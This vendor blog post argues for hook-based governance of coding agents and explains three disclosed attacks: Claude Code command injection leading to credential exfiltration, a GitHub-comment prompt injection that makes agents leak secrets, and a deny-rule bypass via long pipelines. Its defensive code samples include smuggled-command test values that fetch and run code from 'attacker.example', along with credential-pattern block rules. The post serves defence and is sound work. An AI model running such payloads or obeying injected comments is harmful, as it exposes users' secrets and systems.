When the Guardrails Slip: The Case for Hook-Based Governance Across Agent Platforms

Three recent CVEs across Claude Code, Gemini CLI, and Copilot show why enterprises need a platform-agnostic hook layer for agent governance.

Written by George Apostolopoulos
Published on May 18, 2026
Updated on May 18, 2026

Over the last two weeks, three separate disclosures have landed against widely deployed coding agents:

  1. A chain of command-injection CVEs in Claude Code that ends in credential exfiltration.
  2. A cross-vendor prompt-injection attack that hijacks Claude Code, Gemini CLI, and GitHub Copilot through nothing more exotic than a GitHub comment.
  3. A Claude Code deny-rule bypass that silently stops enforcing policy after 50 subcommands.

They're different attacks, and they exploit different weaknesses. But they share two uncomfortable properties. First, in each case the platform's own guardrails were the thing that failed: the vendor's permission prompt, the deny-rule engine, the token-parsing logic. Second, the attacks span vendors: a shop running one coding agent today may well be running a different one next quarter, and the security posture resets each time.

This post argues that a thin, platform-agnostic governance layer, plugged into the hook points each agent already exposes, would have disrupted or contained most of what we've seen, without replacing anything the vendors ship. The same policy ("don't let the agent write .claude/settings.json," "don't let it exfiltrate a file that matches a credential pattern," "deny this git push") should apply whether the underlying agent is Claude Code, Gemini CLI, or Copilot. Hooks are the only surface where that's true today.

A quick refresher on agent hooks

Most modern agent CLIs expose hook points for third-party interception at well-defined events: tool calls, file reads and writes, shell execution, and pre- and post-prompt processing, to name just a few. A hook is simply code the operator drops in that sits between "the agent intends to do X" and "X actually happens," with the option to allow, deny, or rewrite the action.
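To make the allow / deny / rewrite idea concrete, here is a minimal sketch of what such a hook could look like. The `Action` and `Decision` shapes, the `example_hook` name, and the two rules are our own illustrative assumptions, not any vendor's actual hook API.

```python
from dataclasses import dataclass, replace
from enum import Enum
from typing import Optional


class Verdict(Enum):
    ALLOW = "allow"
    DENY = "deny"
    REWRITE = "rewrite"


@dataclass(frozen=True)
class Action:
    """What the agent intends to do (hypothetical, vendor-neutral shape)."""
    tool: str    # e.g. "shell" or "file_write"
    target: str  # command line or file path


@dataclass(frozen=True)
class Decision:
    verdict: Verdict
    action: Optional[Action] = None  # populated only for REWRITE
    reason: str = ""


def example_hook(action: Action) -> Decision:
    """Sits between 'the agent intends to do X' and 'X actually happens'."""
    # Deny: the agent should not modify its own configuration mid-session.
    if action.tool == "file_write" and action.target.endswith(".claude/settings.json"):
        return Decision(Verdict.DENY, reason="agent config is read-only in-session")

    # Rewrite: turn a risky action into a safer equivalent instead of blocking it.
    tokens = action.target.split()
    if action.tool == "shell" and tokens[:2] == ["git", "push"] and "--force" in tokens:
        safer_cmd = " ".join("--force-with-lease" if t == "--force" else t for t in tokens)
        return Decision(Verdict.REWRITE, action=replace(action, target=safer_cmd),
                        reason="downgraded force push")

    # Allow: everything else passes through untouched.
    return Decision(Verdict.ALLOW)
```

The point of the sketch is the return type: a hook that can only say yes or no is a filter, while one that can also hand back a modified action can steer the agent without stalling it.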

Hooks are attractive for enterprise governance because they're easy to deploy (a config file, not a kernel module), they run in userspace, they can be centrally policy-managed, and, crucially, the shape of what they intercept (tool names, file paths, network destinations) is increasingly convergent across vendors. They are not a substitute for a real sandbox or kernel-level monitoring. They are, however, the only control surface that extends cleanly across agent platforms today.

With that framing, let's take a look at the three recent attacks.

Attack 1: the chain of command-injection CVEs

Phoenix Security disclosed three CWE-78 OS command injection vulnerabilities in Claude Code CLI, confirmed exploitable on v2.1.91. They share a root cause (unsanitized string interpolation into shell-evaluated execution) and, more interestingly, they chain.

CVE-2026-35020 is the zero-interaction entry point: an attacker who controls the TERMINAL environment variable gets arbitrary command execution during CLI initialization. CVE-2026-35021 is a classic POSIX double-quote bypass in the editor-path utility: $() and backtick substitutions are still evaluated inside double quotes, so quoting the path doesn't save you. CVE-2026-35022 is the most dangerous: auth-helper configuration values are invoked with shell=true and no input validation, giving the attacker a reliable execution sink on every auth cycle.
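The double-quote point is easy to reproduce on any POSIX system. The snippet below is a generic illustration of the bug class, not the vulnerable Claude Code code path; the `path` value is made up for the demo.

```python
import subprocess
import sys

# Attacker-influenced "path" (illustrative value, not taken from the advisory).
path = "notes$(echo INJECTED).txt"

# Unsafe: the value is interpolated into a shell string. The double quotes
# keep it as one word but do NOT stop $() or backtick substitution.
unsafe = subprocess.run(
    f'printf %s "{path}"', shell=True, capture_output=True, text=True
).stdout

# Safer: pass an argument vector, so no shell ever parses the value.
safe = subprocess.run(
    [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", path],
    capture_output=True, text=True,
).stdout

print(repr(unsafe))  # 'notesINJECTED.txt'
print(repr(safe))    # 'notes$(echo INJECTED).txt'
```

In the first call the shell ran `echo INJECTED` before `printf` ever saw the argument; in the second the string arrived byte for byte.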

The chain is elegant. CVE-2026-35020 establishes execution. The attacker writes a malicious .claude/settings.json that registers a hostile auth helper. On the next authentication, CVE-2026-35022 detonates, and the Phoenix researchers demonstrated four escalating exfiltration variants, ending with multi-line file exfiltration that included Claude Code's own conversation memory.

Where would hooks have intervened? Most decisively, at two points in the middle of the chain:

A file-write hook watching .claude/settings.json and adjacent agent-config paths would flag the implant stage. Configuration writes to the agent's own control surface are a natural canary: the agent itself almost never needs to write them during a session.

A file-read hook on credential-bearing paths (~/.aws/credentials, .env, MEMORY.md, keychain shims) would catch the data collection stage before anything leaves the host.
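A rough sketch of those two path rules follows. The paths come from the examples above; the glob patterns, the `check_file_access` name, and the "alert" / "deny" verdict strings are our assumptions for illustration.

```python
import posixpath
from fnmatch import fnmatchcase

# Writes to the agent's own control surface: flag them (hypothetical globs).
WRITE_ALERT = ["*/.claude/settings.json", "*/.claude/*"]
# Reads of credential-bearing files: block them (hypothetical globs).
READ_DENY = ["*/.aws/credentials", "*/.env", "*/MEMORY.md"]


def check_file_access(op: str, path: str, cwd: str = "/") -> str:
    """Return 'alert', 'deny', or 'allow' for a file operation."""
    # Resolve relative paths and '..' segments first, so 'src/../.env'
    # cannot slip past a pattern written for '.env'.
    full = posixpath.normpath(posixpath.join(cwd, path))
    if op == "write" and any(fnmatchcase(full, p) for p in WRITE_ALERT):
        return "alert"
    if op == "read" and any(fnmatchcase(full, p) for p in READ_DENY):
        return "deny"
    return "allow"


print(check_file_access("write", ".claude/settings.json", cwd="/repo"))  # alert
print(check_file_access("read", "src/../.env", cwd="/repo"))             # deny
print(check_file_access("read", "README.md", cwd="/repo"))               # allow
```

Note that this only normalizes the path lexically. It does not resolve symlinks, so a production rule would also want to check the real path on disk.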

The one place hooks would not cover is the entry point. CVE-2026-35020 fires during process startup, before agent-layer hooks initialize. Closing that gap requires environment-variable hygiene at the wrapper level, which is cheap but has to happen outside the agent runtime.
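As a sketch of what wrapper-level hygiene could look like: build the child environment from an allowlist and drop any value containing shell metacharacters before the agent process starts. The allowlist, the metacharacter set, and the `sanitized_env` / `launch` names are assumptions for illustration; tune them to your environment.

```python
import os
import re
import subprocess

# Hypothetical allowlist: only these variables reach the agent process.
ALLOWED_VARS = {"HOME", "PATH", "LANG", "TERM", "TERMINAL"}
# Characters that let a value break out when interpolated into a shell string.
SHELL_META = re.compile(r"""[`$;&|<>(){}\\"'\n]""")


def sanitized_env(env: dict[str, str]) -> dict[str, str]:
    """Keep allowlisted variables whose values contain no shell metacharacters."""
    clean = {}
    for name, value in env.items():
        if name in ALLOWED_VARS and not SHELL_META.search(value):
            clean[name] = value
    return clean


def launch(agent_argv: list[str]) -> int:
    """Start the agent (argv supplied by the caller) with the cleaned environment."""
    return subprocess.run(agent_argv, env=sanitized_env(dict(os.environ))).returncode


hostile = {
    "TERMINAL": "xterm; curl attacker.example | sh",
    "PATH": "/usr/bin:/bin",
    "HOME": "/home/dev",
    "LD_PRELOAD": "/tmp/x.so",
}
print(sanitized_env(hostile))  # {'PATH': '/usr/bin:/bin', 'HOME': '/home/dev'}
```

Dropping a suspicious variable is the conservative choice here; a wrapper could equally refuse to launch and raise an alert.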

Attack 2: prompt injection via comment

The Comment and Control research, disclosed April 16 by Aonan Guan and collaborators at Johns Hopkins, is the most strategically important of the three. It is cross-vendor by construction: the same attack pattern works against Anthropic's Claude Code Security Review action, Google's Gemini CLI Action, and GitHub Copilot Agent. Anthropic rated its variant CVSS 9.4 Critical.

The mechanics are familiar. An attacker opens a GitHub PR or issue whose title, body, or comment contains prompt-injection content. The agent, running inside a GitHub Actions runner with access to important secrets (ANTHROPIC_API_KEY, GEMINI_API_KEY, GITHUB_TOKEN), ingests the comment as part of its context. The injection instructs the agent to read the secret and write it back, often through GitHub itself, as a commit, an issue edit, or a PR comment. No external command-and-control infrastructure is required; the exfiltration channel is the same platform the agent is already authorized to use.

The architectural observation the researchers make is the one that matters: the prompt injection here is not a bug. It is context the agent is designed to process. Model-level defenses, prompt-level defenses, and GitHub's own runtime layers all exist and were all bypassed, because they all sit upstream of the action the agent ultimately takes.

This is where hooks shine, and where the cross-platform argument becomes concrete:

A pre-tool-call hook can deny or gate git push, gh CLI invocations, and API calls whose payloads match credential patterns. The same rule, "never let the agent emit a token that matches ghp_, sk-ant-, or AIza", applies equally to Claude Code, Gemini CLI, and Copilot.

A pre-file-read hook on environment and credential paths blocks the collection step. Again, one rule across three agents.
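Here is a minimal sketch of the token rule as a pre-tool-call check. The three prefixes are the ones named above; the character classes, minimum lengths, the list of egress commands, and the `pre_tool_call` name are assumptions for illustration.

```python
import re

# Prefixes from the rule above; lengths and character classes are assumptions
# chosen to cut down on false positives.
CREDENTIAL_PATTERNS = [
    re.compile(r"ghp_[A-Za-z0-9]{20,}"),
    re.compile(r"sk-ant-[A-Za-z0-9_-]{20,}"),
    re.compile(r"AIza[A-Za-z0-9_-]{20,}"),
]
# Commands that can carry data off the host (hypothetical list).
EGRESS_PREFIXES = ("git push", "gh ", "curl ")


def pre_tool_call(command: str, payload: str = "") -> str:
    """Return 'deny', 'ask', or 'allow' for a tool call the agent is about to make."""
    text = f"{command}\n{payload}"
    if any(p.search(text) for p in CREDENTIAL_PATTERNS):
        return "deny"  # a token-shaped string is about to leave
    if command.startswith(EGRESS_PREFIXES):
        return "ask"   # gate egress-capable commands for review
    return "allow"


fake_token = "ghp_" + "a" * 36  # synthetic value, not a real credential
print(pre_tool_call(f"gh issue comment 1 --body {fake_token}"))  # deny
print(pre_tool_call("git push origin main"))                     # ask
print(pre_tool_call("ls -la"))                                   # allow
```

Pattern matching on raw bytes will not catch a token the agent has been told to base64-encode or split across calls, which is one reason the file-read rule on the collection step matters as a second line.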

The enterprise-relevant point is not any one of these rules. It's that an organization running three different coding agents should not have to configure three different policy engines to express the same intent. Hooks are the first control surface where a single policy can sit in front of all three.
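One way to picture "a single policy in front of all three" is a thin adapter per agent that maps its hook payload onto a common event, with one policy function behind it. Everything below is hypothetical: the payload field names are invented for the sketch and deliberately not tied to any vendor's real hook schema.

```python
from typing import Callable, Dict

NormalizedEvent = Dict[str, str]  # {"kind": ..., "target": ...}


# One small adapter per agent; the raw field names are made up.
def from_agent_a(raw: dict) -> NormalizedEvent:
    return {"kind": raw["tool"], "target": raw["args"]["path"]}


def from_agent_b(raw: dict) -> NormalizedEvent:
    return {"kind": raw["event_type"], "target": raw["resource"]}


def from_agent_c(raw: dict) -> NormalizedEvent:
    return {"kind": raw["action"]["name"], "target": raw["action"]["file"]}


ADAPTERS: Dict[str, Callable[[dict], NormalizedEvent]] = {
    "agent_a": from_agent_a,
    "agent_b": from_agent_b,
    "agent_c": from_agent_c,
}


def policy(event: NormalizedEvent) -> str:
    """The single rule set, written once against the normalized shape."""
    if event["kind"] == "file_write" and event["target"].endswith(".claude/settings.json"):
        return "deny"
    return "allow"


def evaluate(agent: str, raw: dict) -> str:
    return policy(ADAPTERS[agent](raw))


print(evaluate("agent_a", {"tool": "file_write", "args": {"path": "/r/.claude/settings.json"}}))
print(evaluate("agent_b", {"event_type": "file_write", "resource": "/r/.claude/settings.json"}))
print(evaluate("agent_c", {"action": {"name": "file_write", "file": "/r/.claude/settings.json"}}))
# each line prints: deny
```

Adding a fourth agent means writing one more adapter; the policy itself does not change.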

Attack 3: the deny-rule bypass

Adversa AI's disclosure is smaller in scope but is, in some ways, the most instructive. Claude Code's user-configurable deny rules silently stop enforcing when a compound command contains more than 50 subcommands. An internal constant named MAX_SUBCOMMANDS_FOR_SECURITY_CHECK caps how many subcommands get analyzed; anything beyond position 50 falls back to a generic "ask" prompt, which in automated or long-running contexts is effectively a permit.

The origin is mundane: internal ticket CC-643 noted that analyzing very long pipelines was freezing the UI, so engineering capped it. The assumption was that legitimate users rarely chain that many commands manually. That assumption is straightforwardly wrong in an agent context: an AI-generated pipeline from a prompt-injected source file can easily be 50 harmless-looking commands followed by a malicious payload at position 51.
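The failure mode can be modeled in a few lines. This is a simplified model of the behavior described in the disclosure, not Claude Code's actual implementation: only the constant name and the value 50 come from the report, while the naive splitter and the deny rules are our assumptions.

```python
import re

MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50  # constant name from the disclosure
DENY_PREFIXES = ("curl ", "rm -rf ")      # hypothetical deny rules


def split_subcommands(command: str) -> list[str]:
    # Naive split on &&, ||, ; and |. A real checker needs a real shell
    # parser to handle quoting and subshells.
    return [p.strip() for p in re.split(r"&&|\|\||[;|]", command) if p.strip()]


def capped_check(command: str) -> str:
    """Models the capped behavior: too many subcommands falls back to 'ask'."""
    subs = split_subcommands(command)
    if len(subs) > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK:
        return "ask"  # deny rules are never consulted
    return "deny" if any(s.startswith(DENY_PREFIXES) for s in subs) else "allow"


def full_check(command: str) -> str:
    """Evaluates every subcommand, however long the pipeline is."""
    subs = split_subcommands(command)
    return "deny" if any(s.startswith(DENY_PREFIXES) for s in subs) else "allow"


# 50 harmless commands followed by a payload at position 51.
pipeline = " && ".join(["true"] * 50 + ["curl https://attacker.example/x"])
print(capped_check(pipeline))  # ask
print(full_check(pipeline))    # deny
```

In an unattended run, "ask" has nobody to answer it, which is how a performance cap turns into a policy hole.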

What this attack really demonstrates is a governance principle, not a patch-level bug. Native agent guardrails are subject to vendor engineering trade-offs (performance, UX, token budget) that you cannot see and cannot audit, and those trade-offs can silently degrade security properties you were relying on. Anthropic's own newer tree-sitter parser, which would have fixed this, existed in the codebase but was not enabled in public builds at disclosure time.

A hook-based policy layer evaluates outside that trade space. It doesn't care whether Claude Code parsed a pipeline eagerly or lazily, or whether the check got token-budgeted out. The hook sees the concrete action the agent is about to take (a specific rm on a specific path, a specific curl to a specific URL) and enforces policy on that. The native control plane is one layer; the hook layer is a second, independent one, and independence is the whole point.

Mapping attacks to hook intercept points

Pulling the three attacks together gives a compact coverage picture. The table below uses the same attack-stage-by-hook-type framing that's natural to operators thinking about where to deploy:

| Attack stage | Hook type | Would a hook catch it? |
|---|---|---|
| TERMINAL env-var injection (CVE-2026-35020) | Process-spawn / env sanitization | Partial: needs a layer outside the agent runtime |
| Editor path subshell injection (CVE-2026-35021) | Shell-argument inspection | Yes, with pattern matching on $() and backticks |
| Malicious .claude/settings.json write | File-write hook | Strong intercept |
| Credential / memory file read | File-read hook | Strong intercept |
| GitHub comment prompt injection → git push of secrets | Pre-tool-call hook | Strong intercept, vendor-agnostic |
| Deny-rule bypass via 50+ subcommand pipeline | Pre-cmd-execution hook | Strong: external hook is not token-budgeted |

Two things stand out. First, the middle of every attack chain (the file touch, the tool call, the egress) gets covered. Second, the coverage is the same regardless of which agent vendor is running underneath, because the events at those points are structurally similar across platforms.

What hooks do not cover

A hook layer is not a sandbox and shouldn't be sold as one. The attacks above also highlight its limits:

Entry-point injection that fires before the agent's hook loader runs (the TERMINAL case) is a timing gap. The fix is environment hygiene at process launch, which lives in a wrapper script or orchestrator, not in the hook layer itself.

In-process bypasses are a second gap: an attacker who already has code execution inside the agent runtime can likely sidestep userspace hooks. That's a threat model for a real OS-level sandbox (seccomp, Landlock, or an eBPF-based layer like the sandboxing efforts some teams are experimenting with). Hooks and sandboxes are complementary, not competing.

Policy authoring is the part vendors don't solve for you. The rules above, "alert on writes to agent config," "deny egress of credential-pattern bytes", have to be written and maintained. A hook layer is a control plane; the actual policy is still your call.

Why we think this matters

We've been building a hook-based agent governance product with exactly this threat landscape in mind. It currently supports file-access policy across multiple agent platforms; network-egress and tool-call policy are on the near-term roadmap. The bet is not that hooks are the last word in agent security (they aren't), but that they are the first layer that actually composes across the agent ecosystem an enterprise is likely to deploy. Every attack we've walked through here would have been wholly or partially contained by a small set of hook rules that transfer, unchanged, from Claude Code to Gemini CLI to Copilot.

If you're running coding agents in production and wrestling with the fact that each one has its own permission model and none of them is centrally auditable, we'd love to compare notes. The interesting question isn't whether hooks are sufficient (they aren't), but whether a platform-agnostic hook layer is the right place to start building the governance story that your native controls can't, by design, give you.
